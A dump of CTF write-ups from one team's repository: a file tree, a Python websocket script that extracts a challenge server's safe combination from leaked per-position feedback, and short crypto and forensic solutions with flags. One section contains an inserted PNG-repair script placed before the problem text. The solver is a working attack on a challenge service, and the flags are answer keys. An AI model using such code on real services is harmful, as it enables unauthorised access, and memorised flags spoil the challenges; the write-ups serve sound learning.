├── 2016 ├── 3DS2016 │ ├── pwn │ │ └── please-no │ │ │ ├── README.md │ │ │ ├── README.md~ │ │ │ ├── payleaseshell.py │ │ │ ├── payplease.py │ │ │ ├── payplease.py~ │ │ │ ├── payputshell.py │ │ │ ├── paysheelbf.py │ │ │ └── please-no │ └── web │ │ └── safe_cracking_in_a_websockets_house │ │ ├── README.md │ │ └── breakThatSafe.py ├── IceCTF2016 │ ├── crypto │ │ ├── alien-message │ │ │ ├── alien_message_b84f283848b7f34fd4c7529186e66e120b0a374c9d0f2a225b0a7a215716afb5.png │ │ │ ├── futurama.gif │ │ │ └── readme.md │ │ ├── over-the-hill │ │ │ ├── hill.py │ │ │ └── readme.md │ │ ├── rotated │ │ │ └── readme.md │ │ ├── rsa1 │ │ │ └── README.md │ │ ├── rsa2 │ │ │ └── README.md │ │ ├── rsa? │ │ │ └── README.md │ │ └── subsituted │ │ │ └── README.md │ ├── forensic │ │ ├── BlueMonday │ │ │ └── README.md │ │ ├── audio-problems │ │ │ ├── flag_audio_problems.png │ │ │ └── readme.md │ │ ├── corrupt-transmission │ │ │ └── README.md │ │ ├── intercepted-conversations-pt1 │ │ │ ├── README.md │ │ │ └── kinesis.png │ │ └── time-traveler │ │ │ └── readme.md │ ├── misc │ │ ├── matrix │ │ │ ├── QRCode-2-Structure.jpg │ │ │ ├── README.md │ │ │ ├── matrix.png │ │ │ └── matrix2.png │ │ ├── scavenger_hunt │ │ │ ├── crawl.py │ │ │ └── readme.md │ │ └── search │ │ │ └── readme.md │ ├── pwn │ │ ├── DearDiary │ │ │ └── readme.md │ │ ├── Demo │ │ │ └── README.md │ │ └── Ropi │ │ │ ├── #Gh.c# │ │ │ ├── Gh.c │ │ │ ├── Gh.hop │ │ │ ├── NC │ │ │ ├── flag.txt │ │ │ ├── p.py │ │ │ ├── payload │ │ │ ├── pile.py │ │ │ ├── pile2.py │ │ │ ├── pile3.py │ │ │ ├── readme.md │ │ │ ├── ropi │ │ │ ├── solution.zip │ │ │ └── source.c │ ├── recon │ │ └── complacent │ │ │ └── readme.md │ ├── stegano │ │ └── vape-nation │ │ │ ├── flag_vape.png │ │ │ └── readme.md │ └── web │ │ ├── chainedIN │ │ ├── readme.md │ │ └── sploit.py │ │ ├── exposed │ │ └── README.md │ │ ├── flag-storage │ │ └── readme.md │ │ ├── geoip │ │ └── README.md │ │ ├── kitty │ │ └── README.md │ │ ├── miners │ │ └── README.md │ │ ├── move-along │ │ 
├── flag_move_along.jpg │ │ └── readme.md │ │ └── spotlight │ │ └── readme.md ├── csaw2016 │ ├── forensic │ │ ├── clams_dont_dance │ │ │ ├── image0.gif │ │ │ └── readme.md │ │ └── kill │ │ │ └── readme.md │ ├── misc │ │ ├── coinslot │ │ │ ├── coinslot.py │ │ │ └── readme.md │ │ └── regexpire │ │ │ ├── readme.md │ │ │ └── regexpire.py │ ├── pwn │ │ ├── Hungman │ │ │ ├── dumpjeu.help │ │ │ ├── exemple.jeu │ │ │ ├── hungman │ │ │ ├── hungman.gdb │ │ │ ├── hungman.i64 │ │ │ ├── hungman.txt │ │ │ ├── hungman_all.c │ │ │ ├── hungman_ida.c │ │ │ ├── jeu-0.py │ │ │ ├── jeu-2.py │ │ │ ├── jeu-final.py │ │ │ ├── jeu-final.py~ │ │ │ ├── jeu.bin │ │ │ ├── lance │ │ │ ├── libc-2.23.so │ │ │ └── readme.md │ │ └── Tutorial │ │ │ ├── NC2 │ │ │ ├── NC2.tgz │ │ │ ├── NC2l │ │ │ ├── exploit-0.py │ │ │ ├── exploit-0.py~ │ │ │ ├── libc-2.19.so │ │ │ ├── readme.md │ │ │ ├── tuto.canari │ │ │ ├── tutorial │ │ │ ├── tutorial.c │ │ │ ├── tutorial.i64 │ │ │ ├── tutorial.solution │ │ │ ├── tutorial2 │ │ │ ├── tutorial_ida.c │ │ │ ├── what │ │ │ ├── writeup.py │ │ │ └── writeup.py~ │ └── web │ │ └── mfw │ │ ├── index.php │ │ ├── readme.md │ │ └── templates │ │ ├── about.php │ │ ├── contact.php │ │ ├── flag.php │ │ └── home.php ├── hackit2016 │ ├── crypto │ │ └── senegal-evil-corp │ │ │ ├── orig.txt │ │ │ ├── output.txt │ │ │ ├── readme.md │ │ │ └── script.sh │ ├── network │ │ └── australia-voice-of-the-future │ │ │ ├── bf_cipher.sh │ │ │ ├── e06.ogg │ │ │ ├── fil-aes-256-cbc.dec │ │ │ ├── key.enc │ │ │ └── readme.md │ ├── ppc │ │ ├── belarus │ │ │ ├── flag.jpg │ │ │ ├── o2.txt │ │ │ ├── o3.txt │ │ │ ├── orig.txt │ │ │ ├── out.txt │ │ │ ├── pain.txt │ │ │ ├── read_hex.py │ │ │ ├── read_out.py │ │ │ ├── read_pain.py │ │ │ └── readme.md │ │ └── mongolie │ │ │ ├── mongolie.py │ │ │ └── readme.md │ ├── reverse │ │ └── malaysia │ │ │ ├── PhParanoid_3x3cut10nl0g.dmp │ │ │ ├── PhParanoid_b7fa460590b3dc2a7662dc0bb633a7d8.phb │ │ │ ├── decalage.py │ │ │ ├── dump.orig │ │ │ ├── dump.txt │ │ │ ├── new.py 
│ │ │ ├── new2.py │ │ │ ├── new3.py │ │ │ ├── new4.py │ │ │ ├── output_new4.py │ │ │ ├── parser.py │ │ │ ├── readme.md │ │ │ ├── to_parse │ │ │ └── to_parse2 │ ├── stego │ │ ├── azerbaijan-suspicious-avi │ │ │ ├── compared_00057406.png │ │ │ ├── h4ck1t_pepapig.py │ │ │ ├── readme.md │ │ │ ├── vidz-orig.png │ │ │ └── vidz.png │ │ └── mozambique-1magePr1son │ │ │ ├── getflag.py │ │ │ ├── outgrid.png │ │ │ ├── planet.png │ │ │ └── readme.md │ └── web │ │ ├── northkorea │ │ ├── parse_parenthesis.py │ │ └── readme.md │ │ └── russia │ │ ├── generate_qrcode.py │ │ ├── out.png │ │ └── readme.md ├── hackthevote2016 │ └── pwn │ │ └── irs │ │ └── README.md └── qiwictf │ └── Crypto_300_2 │ ├── #writeup.py# │ ├── session.python │ ├── writeup.lyx │ └── writeup.pdf ├── 2017 ├── SECCON │ └── binary │ │ └── powerfull_shell │ │ ├── README.md │ │ ├── exploit.py │ │ └── powerful_shell.ps1-1fb3af91eafdbebf3b3efa3b84fcc10cfca21ab53db15c98797b500c739b0024 ├── Sect-CTF │ ├── pwn │ │ └── Gibson │ │ │ └── readme.md │ └── web │ │ ├── DarkMarket │ │ └── README.md │ │ └── NaughtyAds │ │ ├── README.md │ │ └── sploit.py ├── csaw2017 │ ├── misc │ │ ├── Misc100 │ │ │ ├── README.md │ │ │ └── luhn.py │ │ └── Misc50 │ │ │ ├── README.md │ │ │ └── payload.py │ └── pwn │ │ ├── auir │ │ ├── README.md │ │ ├── README.md.org │ │ ├── auir │ │ ├── auir.c │ │ ├── auir.loc │ │ └── payload.py │ │ ├── pilot │ │ ├── README.md │ │ ├── payload.py │ │ └── pilot │ │ └── scv │ │ ├── README.md │ │ ├── payload.py │ │ └── scv ├── easyctf │ ├── crypto │ │ ├── rsa_1 │ │ │ └── readme.md │ │ ├── rsa_2 │ │ │ └── readme.md │ │ └── rsa_3 │ │ │ └── readme.md │ ├── forensic │ │ ├── Mane_Event │ │ │ ├── img │ │ │ │ └── 588785dd3d2d4e8366c4b0802da7f2425fd7e3fe_lion.jpg │ │ │ └── readme.md │ │ └── My_USB │ │ │ ├── img │ │ │ └── 00002494.jpg │ │ │ └── readme.md │ └── web │ │ ├── edge-1 │ │ ├── img │ │ │ └── edge-1.png │ │ └── readme.md │ │ └── edge-2 │ │ ├── img │ │ └── edge-1.png │ │ └── readme.md ├── fit-hack │ ├── crypto │ │ ├── 
big_number │ │ │ ├── readme.md │ │ │ └── src │ │ │ │ ├── fer │ │ │ │ ├── message │ │ │ │ └── public-key.pem │ │ │ │ └── seru │ │ │ │ ├── message │ │ │ │ └── public-key.pem │ │ ├── encryption_program_leaked │ │ │ ├── readme.md │ │ │ └── src │ │ │ │ └── Cryptographic_program.py │ │ └── service_encrypt │ │ │ └── readme.md │ ├── forensic │ │ └── connect │ │ │ ├── img │ │ │ ├── 00000006.png │ │ │ ├── 00000076.png │ │ │ ├── 00000126.png │ │ │ ├── flag.png │ │ │ └── output.png │ │ │ └── readme.md │ ├── misc │ │ └── color │ │ │ ├── apng │ │ │ ├── apngframe01.png │ │ │ ├── apngframe02.png │ │ │ ├── apngframe03.png │ │ │ ├── apngframe04.png │ │ │ ├── apngframe05.png │ │ │ ├── apngframe06.png │ │ │ ├── apngframe07.png │ │ │ ├── apngframe08.png │ │ │ ├── apngframe09.png │ │ │ ├── apngframe10.png │ │ │ ├── apngframe11.png │ │ │ ├── apngframe12.png │ │ │ ├── apngframe13.png │ │ │ ├── apngframe14.png │ │ │ ├── apngframe15.png │ │ │ ├── apngframe16.png │ │ │ ├── apngframe17.png │ │ │ └── apngframe18.png │ │ │ ├── img │ │ │ └── image.png │ │ │ └── readme.md │ └── web │ │ └── let-s-login │ │ ├── img │ │ ├── bypass.png │ │ ├── login.png │ │ └── sqli.png │ │ └── readme.md ├── hackIT │ ├── pwn150 │ │ ├── README.md │ │ └── pwn150 │ └── pwn200 │ │ ├── README.md │ │ └── pwn200 ├── inshack │ └── crypto │ │ └── readme.md ├── ndh_wargame │ └── crypto │ │ ├── merkle │ │ ├── img │ │ │ ├── arrays.png │ │ │ ├── index.png │ │ │ └── paquet.png │ │ ├── readme.md │ │ └── src │ │ │ ├── merkle.pcap │ │ │ └── merkle.py │ │ └── unlucky │ │ ├── img │ │ ├── bad_signature.png │ │ ├── bmh.png │ │ └── good_signature.png │ │ ├── readme.md │ │ └── src │ │ └── unlucky.txt ├── neverlan │ ├── forensic │ │ ├── not_star_trek │ │ │ ├── img │ │ │ │ ├── 00003840.png │ │ │ │ └── testdisk.png │ │ │ └── readme.md │ │ └── siths_use_ubuntu │ │ │ ├── img │ │ │ ├── authlog.png │ │ │ ├── figure1.png │ │ │ ├── process.png │ │ │ ├── ps.png │ │ │ └── shadow.png │ │ │ └── readme.md │ └── web │ │ └── no_humans_Allowed │ │ ├── 
readme.md │ │ └── robots.py ├── picoCTF │ ├── Crypto │ │ └── masterl4 │ │ │ └── resolution.py │ └── Pwn │ │ ├── l3chat │ │ ├── chat.html │ │ ├── payloadchat.py │ │ └── readme.md │ │ ├── l3console │ │ ├── payload.py │ │ └── readme.md │ │ ├── l3matrix │ │ ├── payloadmatrix.py │ │ ├── pwnfloat.c │ │ └── readme.md │ │ ├── l4flag │ │ ├── payload.py │ │ └── readme.md │ │ ├── readme.md │ │ └── readme.md~ ├── sthack │ ├── misc │ │ └── something_strange │ │ │ └── readme.md │ └── web │ │ └── Mr_president │ │ └── readme.md ├── thcon │ ├── crypto │ │ ├── OTPunched │ │ │ ├── img │ │ │ │ ├── card1.png │ │ │ │ └── card2.png │ │ │ └── readme.md │ │ └── brokenhash │ │ │ ├── file │ │ │ ├── a.pdf │ │ │ ├── b.pdf │ │ │ ├── shattered-1.pdf │ │ │ └── shattered-2.pdf │ │ │ ├── img │ │ │ ├── right.jpg │ │ │ └── top.jpg │ │ │ └── readme.md │ └── web │ │ └── Multipass │ │ ├── img │ │ ├── flag.png │ │ └── web.png │ │ └── readme.md ├── tuctf │ ├── crypto │ │ └── crypto50.py │ ├── pwn │ │ ├── guestbox │ │ │ └── payload.py │ │ ├── vuln-chat │ │ │ └── payload-final.py │ │ └── vuln-chat2 │ │ │ └── payload-final.py │ └── web │ │ └── web200 │ │ ├── solution │ │ └── test.sh ├── xiomara │ ├── misc │ │ └── xiomara_misc_200_shopkeeper_quiz.py │ └── pwn │ │ ├── README.md │ │ ├── mint │ │ └── payload.py │ │ ├── secure_pyshell │ │ ├── pwn2.py │ │ └── readme.md │ │ └── xortool │ │ └── payformat.py └── yubitsec │ ├── crypto │ ├── diffie_hellman │ │ ├── img │ │ │ └── crypto.jpg │ │ └── readme.md │ ├── easy │ │ ├── readme.md │ │ └── src │ │ │ └── secret.txt │ ├── rsa │ │ ├── readme.md │ │ └── src │ │ │ └── RSA │ │ │ ├── Part1 │ │ │ ├── PublicKey1.pem │ │ │ └── ciphertext1 │ │ │ ├── Part2 │ │ │ ├── PublicKey2.pem │ │ │ └── ciphertext2 │ │ │ └── Part3 │ │ │ ├── PublicKey3.pem │ │ │ └── ciphertext3 │ ├── rsa2 │ │ ├── readme.md │ │ └── src │ │ │ ├── PublicKey.pem │ │ │ └── ciphertext │ └── simple_encryption │ │ ├── readme.md │ │ └── src │ │ ├── encrypted │ │ └── simple_enc.py │ ├── stegano │ ├── blushes │ │ ├── 
img │ │ │ ├── indir.png │ │ │ └── solved.bmp │ │ └── readme.md │ ├── falkreath │ │ ├── img │ │ │ └── ciceros.jpg │ │ └── readme.md │ └── text_into_image │ │ ├── img │ │ └── lsb.png │ │ └── readme.md │ ├── warmup │ └── bash │ │ └── readme.md │ └── web │ └── webshell │ ├── img │ └── shell_as_service.png │ └── readme.md ├── 2018 ├── Inshack │ ├── Forensic │ │ └── Worm-in-apple │ │ │ ├── README.md │ │ │ └── source │ │ │ └── DoxyDoxygen.sublime-package │ └── Web │ │ └── Crimemail │ │ ├── README.md │ │ └── img │ │ ├── accueil.png │ │ ├── detect.png │ │ └── sqli.png ├── NoNameCon │ └── web │ │ └── Bank │ │ └── README.md ├── Sharif │ ├── Forensic │ │ └── Hidden │ │ │ └── readme.md │ ├── Pwn250-t00p_secrets │ │ ├── README.md │ │ ├── payload.py │ │ ├── payload.py~ │ │ └── t00p_secrets │ ├── Pwn75-leak_puts │ │ ├── README.md │ │ ├── exploit.py │ │ ├── libc.so.6 │ │ └── vuln4 │ └── Web │ │ ├── Hidden-Input │ │ ├── img │ │ │ ├── burp.png │ │ │ ├── login.png │ │ │ └── sql.png │ │ └── readme.md │ │ └── The-News-Hacker │ │ ├── img │ │ ├── admin.png │ │ ├── burp.png │ │ └── wordpress.png │ │ └── readme.md ├── Thcon │ ├── Network │ │ └── 50 │ │ │ ├── readme.md │ │ │ └── sources │ │ │ └── dump.pcap │ ├── Reverse │ │ ├── 200-android │ │ │ ├── THC.apk │ │ │ ├── readme.md │ │ │ └── solver.py │ │ └── 250-call_less_reverse │ │ │ ├── img │ │ │ ├── cls-function-a761.png │ │ │ ├── cls-function-a7c.png │ │ │ ├── cls-function-modif-stack.png │ │ │ ├── cls-function-sub-874.png │ │ │ ├── cls-functions.png │ │ │ ├── cls-main-decomp.png │ │ │ ├── cls-positive-sp.png │ │ │ ├── cls-stack-761.png │ │ │ ├── cls-stack-761.svg │ │ │ └── cls-verify-hardcoded-flag.png │ │ │ ├── readme.md │ │ │ └── solver.py │ └── Web │ │ ├── 200 │ │ ├── readme.md │ │ └── sources │ │ │ └── sources.zip │ │ └── 300 │ │ ├── img │ │ └── flag.png │ │ └── readme.md ├── Timisoara │ ├── Pwn │ │ ├── Attendance │ │ │ ├── README.md │ │ │ ├── attendance │ │ │ ├── attendance.c │ │ │ └── payload.py │ │ ├── Cdparty │ │ │ ├── README.md │ 
│ │ ├── c_party │ │ │ ├── c_party.c │ │ │ ├── c_party.zip │ │ │ └── payload.py │ │ ├── HeapSchool │ │ │ ├── README.md │ │ │ ├── heaphop │ │ │ └── payload.py │ │ ├── Letssort │ │ │ ├── README.md │ │ │ ├── letssort │ │ │ ├── letssort.c │ │ │ ├── libc.so.6 │ │ │ ├── payload.py │ │ │ └── session │ │ ├── Memo │ │ │ ├── README.md │ │ │ ├── m.c │ │ │ ├── memo │ │ │ ├── memo.c │ │ │ ├── memo.exe │ │ │ ├── memo.zip │ │ │ ├── payload.py │ │ │ ├── pile │ │ │ └── pilelocaleSansASLR │ │ ├── Pwnescu │ │ │ ├── README.md │ │ │ ├── payload.py │ │ │ ├── pwnescu │ │ │ ├── pwnescu.c │ │ │ ├── rand │ │ │ ├── rand.c │ │ │ └── session │ │ └── README.md │ ├── forensic │ │ └── neurosurgery │ │ │ ├── files │ │ │ ├── Ubuntu1604_4.4.0-116.zip │ │ │ └── ht0p │ │ │ └── readme.md │ └── web │ │ ├── BookDir_1_and_2 │ │ └── README.md │ │ └── porcupiney │ │ └── README.md ├── angstrom │ ├── README.md │ ├── crypto │ │ ├── ofb │ │ │ └── readme.md │ │ └── ssh │ │ │ ├── files │ │ │ ├── angryssh.sage │ │ │ ├── id_rsa │ │ │ ├── id_rsa.pub │ │ │ └── privkey.pem │ │ │ └── readme.md │ ├── misc │ │ ├── paste_palooza │ │ │ ├── README.md │ │ │ └── src │ │ │ │ └── pastepalooza │ │ │ │ └── redacted │ │ │ │ ├── config │ │ │ │ └── config.exs │ │ │ │ ├── lib │ │ │ │ ├── pastepalooza.ex │ │ │ │ ├── server.ex │ │ │ │ └── utility.ex │ │ │ │ ├── mix.exs │ │ │ │ └── pastes │ │ │ │ └── paste.txt │ │ └── slots │ │ │ ├── README.md │ │ │ └── src │ │ │ └── slots.py │ └── web │ │ ├── madlibs │ │ ├── README.md │ │ ├── img │ │ │ ├── screen1.png │ │ │ ├── screen2.png │ │ │ ├── screen3.png │ │ │ └── screen4.png │ │ └── src │ │ │ └── app.py │ │ └── md5 │ │ ├── readme.md │ │ └── web-md5-screen.png ├── bsides │ └── forensic │ │ ├── fuzzy │ │ ├── files │ │ │ ├── fuzzy_dns_filter01.png │ │ │ ├── fuzzy_dns_filter02.png │ │ │ ├── fuzzy_dns_filter03.png │ │ │ ├── hex_png.log │ │ │ ├── img.png │ │ │ ├── message.gpg │ │ │ └── private.gpg │ │ └── readme.md │ │ └── never │ │ └── readme.md └── codegate │ └── reverse │ └── RedVelvet │ ├── 
README.md │ ├── RedVelvet │ └── exploit.py └── README.md
--------------------------------------------------------------------------------
/2016/3DS2016/pwn/please-no/please-no:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/3DS2016/pwn/please-no/please-no
--------------------------------------------------------------------------------
/2016/3DS2016/web/safe_cracking_in_a_websockets_house/breakThatSafe.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# Recovers the 8-letter combination of the challenge's websocket "box".
# The server answers every guess with eight '|'-separated numbers, one per
# position; the script treats each number as the offset from 'a' of the
# letter expected at that position, so two probes are enough to learn all
# eight letters and a third message submits the full combination.

import asyncio
import websockets

BOX_URL = "ws://192.241.176.246:8888/box"  # challenge endpoint at the time of the CTF


def letters_from_reply(reply, positions):
    """Turn the server's '|'-separated offsets into letters for the given positions."""
    offsets = reply.split("|")
    return "".join(chr(int(offsets[i]) + ord("a")) for i in positions)


async def break_safe():
    async with websockets.connect(BOX_URL) as ws:
        # First probe: learn positions 0-3.
        await ws.send("aaaa")
        half = letters_from_reply(await ws.recv(), range(0, 4))
        # Second probe: correct first half, learn positions 4-7.
        await ws.send(half + "aaaa")
        other_half = letters_from_reply(await ws.recv(), range(4, 8))
        print(half + other_half)
        # Final guess with the full combination.
        await ws.send(half + other_half)
        print("< {}".format(await ws.recv()))


asyncio.run(break_safe())
--------------------------------------------------------------------------------
/2016/IceCTF2016/crypto/alien-message/alien_message_b84f283848b7f34fd4c7529186e66e120b0a374c9d0f2a225b0a7a215716afb5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/crypto/alien-message/alien_message_b84f283848b7f34fd4c7529186e66e120b0a374c9d0f2a225b0a7a215716afb5.png
--------------------------------------------------------------------------------
/2016/IceCTF2016/crypto/alien-message/futurama.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/crypto/alien-message/futurama.gif
--------------------------------------------------------------------------------
/2016/IceCTF2016/crypto/alien-message/readme.md:
--------------------------------------------------------------------------------
# Alien Message (Cryptography · 40 pt)

We got an image with strange alien symbols.

![Alt](alien_message_b84f283848b7f34fd4c7529186e66e120b0a374c9d0f2a225b0a7a215716afb5.png "Alien Message")

Let's use an alien alphabet to decode it. I used the Futurama alphabet from http://www.omniglot.com/images/writing/futurama.gif

![Alt](futurama.gif "Futurama alphabet")

Note that the symbols differ between uppercase and lowercase letters.

The flag is : IceCTF{gOOd_n3wZ_3veryon3_1_l1k3_fu7ur4ma_4nd_th3ir_4maz1ng_3as7er_39g5}
--------------------------------------------------------------------------------
/2016/IceCTF2016/crypto/rotated/readme.md:
--------------------------------------------------------------------------------
# Rotated! (Cryptography · 20 pt)

The challenge title points to ROT13, so I used an online decoder such as http://www.dcode.fr/rot-13-cipher

VprPGS{jnvg_bar_cyhf_1_vf_3?}

The flag is : IceCTF{wait_one_plus_1_is_3?}
--------------------------------------------------------------------------------
/2016/IceCTF2016/crypto/rsa?/README.md:
--------------------------------------------------------------------------------
# RSA? (crypto · 50 pt)

John was messing with RSA again... he encrypted our flag! I have a strong feeling he had no idea what he was doing however, can you get the flag for us?

```
N=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

e=0x1

c=0x4963654354467b66616c6c735f61706172745f736f5f656173696c795f616e645f7265617373656d626c65645f736f5f63727564656c797d
```

c is the ciphertext and e the public exponent, both in hexadecimal.

Look at the exponent: e = 1! With e = 1 we have c = m^1 mod N = m (the message is smaller than N), so there is no encryption at all :)

A simple hex-to-ASCII conversion of the ciphertext, for example with http://www.rapidtables.com/convert/number/hex-to-ascii.htm, gives the flag:

IceCTF{falls_apart_so_easily_and_reassembled_so_crudely}

eilco
--------------------------------------------------------------------------------
/2016/IceCTF2016/crypto/subsituted/README.md:
--------------------------------------------------------------------------------
# substituted (crypto · 30 pt)

We got a substitute flag, I hear they are pretty lax on the rules…

```
Lw!

Gyzvecy ke WvyVKT!

W'zz by reso dsbdkwksky tzjq teo kly ujr. Teo keujr, gy joy dksurwmq bjdwv vorakeqojalr jmu wkd jaazwvjkwemd.
Vorakeqojalr ljd j zemq lwdkeor, jzklesql gwkl kly juxymk et vecaskyod wk ljd qekkym oyjzzr vecazwvjkyu.
Decy dwcazy ezu vwalyod joy kly Vjydjo vwalyo, kly Xwqymyoy vwalyo, kly dsbdkwkskwem vwalyo, glwvl wd klwd emy, jmu de em.
Jzcedk jzz et klydy vwalyod joy yjdwzr boeiym keujr gwkl kly lyza et vecaskyod.
Decy myg ymvorakwem cykleud joy JYD, kly vsooymk dkjmujou teo ymvorakwem, jzemq gwkl ODJ.
Vorakeqojalr wd j xjdk twyzu jmu wd xyor wmkyoydkwmq klesql.
De iwvi bjvi, oyju sa em decy veez vwalyod jmu ljxy tsm!

El jmu teo reso oyveoud cr mjcy wd WvyVKT{jzgjrd_zwdkym_ke_reso_dsbdkwksky_tzjqd}.
```

I tried to identify a known substitution scheme, without success, so I started from a crib given by the flag format:

```
WvyVKT = IceCTF
```

From this I gathered that "Gyzvecy" was "Welcome", and by extending the key by hand I found the flag: IceCTF{always_listen_to_your_substitute_flags}

By eilco
--------------------------------------------------------------------------------
/2016/IceCTF2016/forensic/audio-problems/flag_audio_problems.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/forensic/audio-problems/flag_audio_problems.png
--------------------------------------------------------------------------------
/2016/IceCTF2016/forensic/audio-problems/readme.md:
--------------------------------------------------------------------------------
# Audio Problems (Forensics · 50 pt)

First, check the file type:

```bash
file audio_problems_210b88f2232e1c9d770bb5d2069c47aabb86301b0adc7ad606956394a00f298b.wav
audio_problems_210b88f2232e1c9d770bb5d2069c47aabb86301b0adc7ad606956394a00f298b.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 44100 Hz
```

Open the audio file in Sonic Visualiser: Layer => Add Spectrogram => All Channels Mixed.

The flag is written in the spectrogram:

![Alt](flag_audio_problems.png "Flag Audio Problems")

The flag is : IceCTF{y0U_b3t7Er_l15TeN_cL053lY}
--------------------------------------------------------------------------------
/2016/IceCTF2016/forensic/corrupt-transmission/README.md:
--------------------------------------------------------------------------------
# corrupt transmission (forensic · 50 pt)

We intercepted this image, but it must have gotten corrupted during the transmission. Can you try and fix it?
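The repair described in this writeup can be scripted, and the same pass over the file tells you whether the damage stops at the signature. The following is an added example, not code from the original writeup: it restores the 8-byte PNG signature and then walks the chunks verifying each CRC, so corruption inside the chunk data (what a real EOL conversion would cause) is reported per chunk instead of being found by trial and error. The 1x1 PNG it tests itself against is constructed here; the damaged signature bytes are the ones shown by xxd in this writeup.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def repair_signature(data):
    """Overwrite the first 8 bytes with the fixed PNG signature.

    The challenge file started with 90 50 4e 47 0e 1a 0a 1b instead of
    89 50 4e 47 0d 0a 1a 0a. The signature carries no per-file information,
    so it can always be rewritten; whether that is enough is decided by the
    chunk CRCs checked below.
    """
    if len(data) < 8:
        raise ValueError("file too short to be a PNG")
    return PNG_SIGNATURE + data[8:]


def iter_chunks(data):
    """Yield (type, payload, crc_ok) for every chunk after the signature.

    A chunk is: 4-byte big-endian length, 4-byte type, payload, 4-byte CRC32
    computed over type + payload. A failing CRC pinpoints remaining damage.
    """
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(payload) != length or len(crc_bytes) != 4:
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        (crc,) = struct.unpack(">I", crc_bytes)
        yield ctype, payload, (zlib.crc32(ctype + payload) & 0xFFFFFFFF) == crc
        pos += 12 + length
        if ctype == b"IEND":
            break


def check_png(data):
    """Return a report: signature validity plus (type, length, crc_ok) per chunk."""
    chunks = [(t.decode("ascii"), len(p), ok) for t, p, ok in iter_chunks(data)]
    return {"signature_ok": data[:8] == PNG_SIGNATURE, "chunks": chunks}


def make_chunk(ctype, payload):
    """Serialise one chunk with a correct CRC."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_sample_png():
    """Constructed 1x1 8-bit grayscale PNG used as sample input (not the challenge file)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, color type, ...
    idat = zlib.compress(b"\x00\x00")  # one scanline: filter byte + one pixel
    return (PNG_SIGNATURE + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"IDAT", idat) + make_chunk(b"IEND", b""))


def corrupt_like_challenge(data):
    """Apply the same 8-byte signature damage that xxd showed on the challenge file."""
    return bytes.fromhex("90504e470e1a0a1b") + data[8:]


if __name__ == "__main__":
    import sys
    raw = open(sys.argv[1], "rb").read()
    fixed = repair_signature(raw)
    print(check_png(fixed))
    open(sys.argv[1] + ".fixed.png", "wb").write(fixed)
```

Run it as `python3 fixpng.py corrupt_....png`: if every chunk reports `True`, the rewritten signature was the only problem, which is the situation in this challenge; a `False` names the chunk that still needs attention.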
The PNG file seems to be corrupt.

With pngcheck:

```
root@kali:~/Bureau# pngcheck -v corrupt_92cee405924ad39fb513e3ef910699b79bb6d45cc5046c051eb9aab3546e22c3.png
File: corrupt_92cee405924ad39fb513e3ef910699b79bb6d45cc5046c051eb9aab3546e22c3.png (469363 bytes)
File is CORRUPTED. It seems to have suffered EOL conversion.
It was probably transmitted in text mode.
```

The first 8 bytes of the file, the PNG signature, have been modified, as we can see with:

```
root@kali:~/Bureau# xxd -l8 corrupt_92cee405924ad39fb513e3ef910699b79bb6d45cc5046c051eb9aab3546e22c3.png
0000000: 9050 4e47 0e1a 0a1b
```

A normal PNG signature is: 89 50 4E 47 0D 0A 1A 0A.

Once the signature is corrected, the picture opens and shows us the flag :)

eilco
--------------------------------------------------------------------------------
/2016/IceCTF2016/forensic/intercepted-conversations-pt1/README.md:
--------------------------------------------------------------------------------
# Intercepted Conversations Pt.1 (forensic · 110 pt)

This traffic was picked up by one of our agents. We think this might be a conversation between two elite hackers that we are investigating.
Can you see if you can analyze the data? intercept.pcapng

Wireshark shows USB traffic between two devices.

The first part of the capture is an exchange between the two devices, and the second part shows a USB device sending URB_INTERRUPT transfers, which probably carry the flag.

```
frame 64 > interesting hint! idProduct: Kinesis Integrated
frame 72 > Kinesis integrated keyboard
```

So the flag is probably keystrokes typed on a keyboard.

There are 4 basic USB transfer types: control, interrupt, isochronous and bulk.

http://www.beyondlogic.org/usbnutshell/usb4.shtml#Interrupt

I saw a lot of traffic between device 3.21.1 and the host:
72 bytes in one direction,
64 bytes in the other.

The difference is 8 bytes of data, which matches interrupt transfers from a low-speed device such as a keyboard:

"the maximum data payload size for low-speed devices is 8 bytes"

I used this filter in Wireshark:
```
((usb.transfer_type == 0x01) && (frame.len == 72))
```

For each packet, the "leftover capture data" field holds the 8 bytes of data: a HID boot-protocol keyboard report (one modifier byte, one reserved byte, then up to six key usage IDs).

So I needed to match the hex values of these 8 bytes to keyboard keys.

The HID Usage Tables document lists the keyboard usage IDs:
```
root@kali:~# wget http://www.usb.org/developers/hidpage/Hut1_12v2.pdf
(page 53)
```

Decoding each report with the US QWERTY layout gives: gidiky{,j0-p1v3;-x,3o7t-4lt,4t5}

Obviously that is not the right flag :)

So I looked at the maker of the Kinesis integrated keyboard to see whether there is something specific about the KINESIS KEYBOARD.

In this document:

http://www.kinesis-ergo.com/wp-content/uploads/2015/01/kinesis_advantage_user_manual.pdf
(page 39)

![Alt](kinesis.png "kinesis keyboard")

The keyboard was in its Dvorak layout: the same key positions carry different letters, so each keycode has to be mapped to the Dvorak legend of that key instead of the QWERTY one.

great !
